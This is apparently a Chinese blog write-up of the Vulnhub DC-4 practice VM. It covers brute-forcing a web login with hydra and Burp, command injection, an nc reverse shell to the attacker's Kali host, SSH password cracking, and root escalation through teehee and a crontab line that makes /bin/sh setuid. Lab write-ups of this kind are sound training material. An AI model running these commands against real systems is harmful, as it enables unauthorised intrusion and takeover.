Vulnhub靶机:DC-4暴力破解——新手进阶4

最新推荐文章于 2024-04-27 23:11:41 发布
最新推荐文章于 2024-04-27 23:11:41 发布
阅读量1.3k 收藏 40
点赞数 44
文章标签: linux 安全 web 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75051044/article/details/136948102
版权

环境准备

攻击机:kali

靶机:Vulnhub靶机:DC-1

靶机下载:https://www.vulnhub.com/entry/dc-4,313/

在VMware中打开靶机,将虚拟机网络适配器改为NAT,只要跟kali机一样就行

渗透测试流程

 确定目标

信息收集/服务确认(下面展示三种方法,一般用第一种,信息更详细

1.nmap实现信息收集

2.arp-scan -l实现信息收集

3.netdiscover实现信息收集

靶机ip为192.168.10.141

输入nmap -A -p- 192.168.10.141,看到开放端口有80,22

访问一下80,发现是一个登录页面

这次渗透主要是学习爆破,下面介绍几个爆破方法

爆破方法1

kali输入hydra -l admin -P rockyou.txt 192.168.66.133 -vV http-post-form

"/login.php:username=^USER^&password=^PASS^:S=logout" -F开始爆破

爆破方法2:(速度比使用hydra更慢

使用burpsuite进行抓包,下面是抓包成功的截图

进行密码爆破,右键 选择 “send to intruder”,设置爆破点模式:"sniper " 爆破点设置为password,然后开始爆破密码

使用username=admin password=happy登录后再次抓包

右键点击Send to repeater,点击选项框的Repeater,d点击Send

可以看到成功执行,那我们是不是可以使用nc命令进行反弹,获取到目标靶机 shell 呢?尝试一下

1.首先,在kali渗透机里面,使用 nc 打开监听

2.修改命令为 nc 192.168.10.136 7777 -e /bin/bash

#nc命令使用的是kali渗透机的ip地址,端口号需要和你上方nc监听端口一致

监听成功

使用python切换到交互式模式

先后进入home 目录,jim目录,backups目录

查看old-passwords.bak,确认是一个密码文件

退回上一级目录,查看test.sh

破解jim用户密码

在破解之前,我们需要把这个文件里面的内容cp到我们kali里面,我使用的方法是burpsuite构造语句重定向去获取

接下来就是将old-passwords中的内容复制到kali中形成字典pass.txt,再用hydra进行暴力破解,就是进行下面的第16步了。

3.可以获得username=admin password=happy

登录成功

在源代码中更改ls -l命令为whoami

更改命令为cat /etc/passwd

更改命令为ls -l /home

获得三个普通用户

drwxr-xr-x 2 charles charles 4096 Apr  7  2019 charles

drwxr-xr-x 3 jim     jim     4096 Apr  7  2019 jim

drwxr-xr-x 2 sam     sam     4096 Apr  7  2019 sam

分别查看普通用户,发现jim有文件

drwxr-xr-x 2 jim jim 4096 Apr  7  2019 backups

-rw------- 1 jim jim  528 Apr  6  2019 mbox

-rwsrwxrwx 1 jim jim  174 Apr  6  2019 test.sh

又分别进入3个文件,发现text.sh下有old-passwords.bck

打开文件old-passwords,可以看到字典

创建密码字典和用户字典

进行ssh爆破

爆破出jim的密码

尝试ssh登录,登录成功

输入find / -perm -u=s -type f

发现jim不是dc4的sudo

输入cat mbox查看是邮件

输入mail回车

提权

第一种提权:玩一下teehee命令

密码^xHhA&hvim0y是charles的,登录charles的ssh

提权成功

进入root文件夹ls运行一下发现flag.txt文件,打开获得flag

第二种提权:通过定时任务执行脚本提权

输入echo "****root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

再操作cat /etc/crontab

ls -al /bin/sh

ls -al /bin/bash

/bin/sh

提权成功,获得flag

总结

本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码进行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite进行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。通过此次学习,自己巩固了bruqsuite的使用,学习了使用工具hydra进行爆破,学习了teehee命令,挺好玩的

葱姜蒜的葱
关注
  • 44
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub靶机DC4
qq_48904485的博客
02-14 407
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机DC4(10.0.2.57)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/
009 - VulnHub靶机:pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞提权+shellshock漏洞提权
最新发布
Windmill_的博客
04-27 1502
pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞提权+shellshock漏洞提权
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4428
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1724
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub系列之DC4靶场详解
weixin_50053818的博客
05-09 822
@ [TOC] 环境 vulhub系列之DC4靶场 VMware虚拟机 kali 爆破网站管理员用户拿shell 由目标靶机的Mac地址可以得出靶机IP为`192.168.43.140`.nmap扫描结果得知目标靶机开放了80端口和22端口,所以只能从目标网站下手。直接进入网首页。 根据首页信息可以知道,有admin用户,所以直接用burpsuite爆破,用软件自带密码即可。 爆破成功,密码是happy。登陆进去发现是命令执行,所以直接抓包改数据,反弹shell。 反弹shell成功,是用n
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1551
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1016
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
VulnHub系列】DC4
大方子
04-09 665
https://note.youdao.com/s/FdSgf6NE
Vulnhub渗透靶机系列----DC4
m0_67284865的博客
08-18 96
vulnhub详细步骤解析,Vulnhub渗透靶机系列----DC4
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1900
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
vulnhub-dc4
bqnagus
10-05 1154
vulnhub-dc4靶机复现
vulnhub-DC4
weixin_55129870的博客
05-16 115
kaliip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC4ip: 192.168.44.144 端口扫描 nmap -A -p1-65535 -T4 192.168.44.144 开放80、22端口,对应http,ssh服务 访问http服务 指纹识别 whatweb http://192.168.44.144 得知,web服务器为nginx 1.15.10 爆破吧,猜测用户名为admin,使用kali的/.
Vulnhub DC-4
Pai_Space
02-17 580
描述: 只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 192.168.37.133 直接 submit 就可以登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f ...
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值